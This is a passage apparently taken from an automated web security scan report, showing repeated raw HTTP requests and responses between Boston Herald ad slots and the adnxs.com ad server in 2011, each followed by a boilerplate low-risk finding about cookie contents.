anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5Q%JvH4xDy_Pa]7S).d*U`>Ok$)gcuXD-L66R1@O4vp]ccG_H+%(u%mQtz*[d<.HEQ2b+)89LT/'^G@=+00].ps-rcmC0]*`Bb^`#V*AM6Ne*R5L=aW-ObhHV=.^C5BoO'uuJk8/]y:]wAdA6qeH?q7qFudKnD[)aHje%=uq$/OH'(wercy6M%TG:^q9-lPoF(K[-HVk; path=/; expires=Fri, 29-Apr-2011 01:42:21 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:21 GMT Content-Length: 663
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-83450342_1296254125%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D782666%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.1877197385765612%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb510504=5_[r^208WMuF4Lw)IE.8w)IgJ?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPwQ_cisQ0NJ6BWHfHSmrEELAQkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQENgYBAgUCAAIAAAAAlCBOvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253632%29%3Buf%28%27r%27%2C+151403%2C+1296253632%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2811%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2887%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28619%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28620%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28621%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb510504=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb437727=5_[r^208WMuF4Lw)IE.8pxVr8?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-1RhKNLepg-BWHfHSmrEEKtRENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpggBAgUCAAIAAAAA6SF9GAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254125%29%3Buf%28%27r%27%2C+151403%2C+1296254125%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2811%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2887%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28619%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28620%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28621%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:35:25 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Fri, 28 Jan 2011 22:35:25 GMT Content-Length: 834
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-46060337_1296254384%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D966058%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.8368365135975182%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb437727=5_[r^208WMuF4Lw)IE.8pxVr8?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-1RhKNLepg-BWHfHSmrEEKtRENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpggBAgUCAAIAAAAA6SF9GAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254125%29%3Buf%28%27r%27%2C+151403%2C+1296254125%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2811%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2887%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28619%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28620%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28621%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb437727=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb208574=5_[r^208WMM2x@N!@@-#jWrqQ?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEPzzOLJCC5ShcBWHfHSmrEEKZcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEFwkBAgUCAAIAAAAAPyIyOwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265369%29%3Buf%28%27r%27%2C+116344%2C+1296265369%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:42:49 GMT Content-Length: 833
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-85794731_1296251888%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D262895%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.33319127024151385%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-98462601_1296252387%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D274606%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.9608076433651149%3F HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sess=1; icu=EAAYAA..; acb119885=5_[r^208WMrO@Pn)IE.80Xxlp?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-hU1RiHaOEDBWHfHSmrEELrPENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBAkBAgUCAAIAAAAAeiENGgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252139%29%3Buf%28%27r%27%2C+151403%2C+1296252139%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2811%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2887%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28619%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28620%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28621%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb119885=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: 